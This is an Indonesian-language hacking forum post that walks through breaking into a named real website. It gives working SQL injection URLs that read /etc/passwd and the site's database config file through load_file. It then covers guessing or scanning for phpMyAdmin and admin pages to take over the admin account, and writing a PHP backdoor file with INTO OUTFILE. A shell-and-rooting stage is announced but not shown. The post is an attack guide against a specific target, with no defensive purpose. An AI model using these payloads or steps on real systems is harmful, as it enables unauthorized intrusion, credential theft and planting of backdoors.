cmn nambahin doank koq Omz biar ada kelanjutannya:
Level 1 : Take over Site Admin (Udah ada yg ngasih screenshotx)
Code: Select all
http://ioseaturtles.org/headline_detail.php?id=-1582+union+all+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8,9,10--
Langkah sampe mendapatkan lokasi ini bisa liat posting sebelomnya,Bag. Load_File tinggal ganti dengan lokasi ini dlm bentuk HEX:
/web/./ioseaturtles/_include/class.mysql.php
Nnt cari baris konf. koneksi ke database...
phpmyadmin page, bisa ditebak2 dl or scan pke page scanner:
http://ioseaturtles.org/phpmyadmin/
Cari tabel yg berisi user dan pass login yg tepat...
halaman webadmin, bisa nebak2 or scan :
http://ioseaturtles.org/webadmin/
Level 2 : Create PHP File / Backdoor
Code: Select all
Bermodalkan phpmyadmin yg telah diakses, bisa nyoba menggunakan INTO OUTFILE ke lokasi yg pasti dapat di tulisi mis: dir /tmp
Pada phpmyadmin pilih tab SQL, lalu ketikkan kodex, mis :
SELECT '3xtr3m3b0y w45 h3r3' INTO OUTFILE '/tmp/3xtr3m3b0y.php'
Jika tidak ada error kemungkinan berhasil, utk pastinya bisa memanfaatkan LOAD_FILE, ketikkan ini pada jendela SQL :
SELECT load_file('/tmp/3xtr3m3b0y.php')
atau masukkan alamat ini di address Browser :
http://ioseaturtles.org/headline_detail.php?id=-1582+union+all+select+1,2,3,load_file(0x2f746d702f33787472336d336230792e706870),5,6,7,8,9,10--
Jika berhasil seharusnya muncul isi dari file tersebut...
Kendala utama adalah mencari lokasi yg tepat pada web directory, untuk mencari lokasi target bisa menggunakan bantuan page scanner sprt Intellitamper, Acunetix dll, atau bisa jg mencari fasilitas upload file pada Admin Site yg telah diambil alih sebelumnya, lalu mencoba menggunakan lokasi tsb sebagai target penulisan file. Jika muncul pesan Error 13 berarti kita tdk diberi izin write...
Level 3 : Gaining Shell & Rooting
Dinantikan...
Mhn dikoreksi, krn pasti masih banyak kesalahanx, maklum msh CuPu Omz dan Kk skalian... :kaca: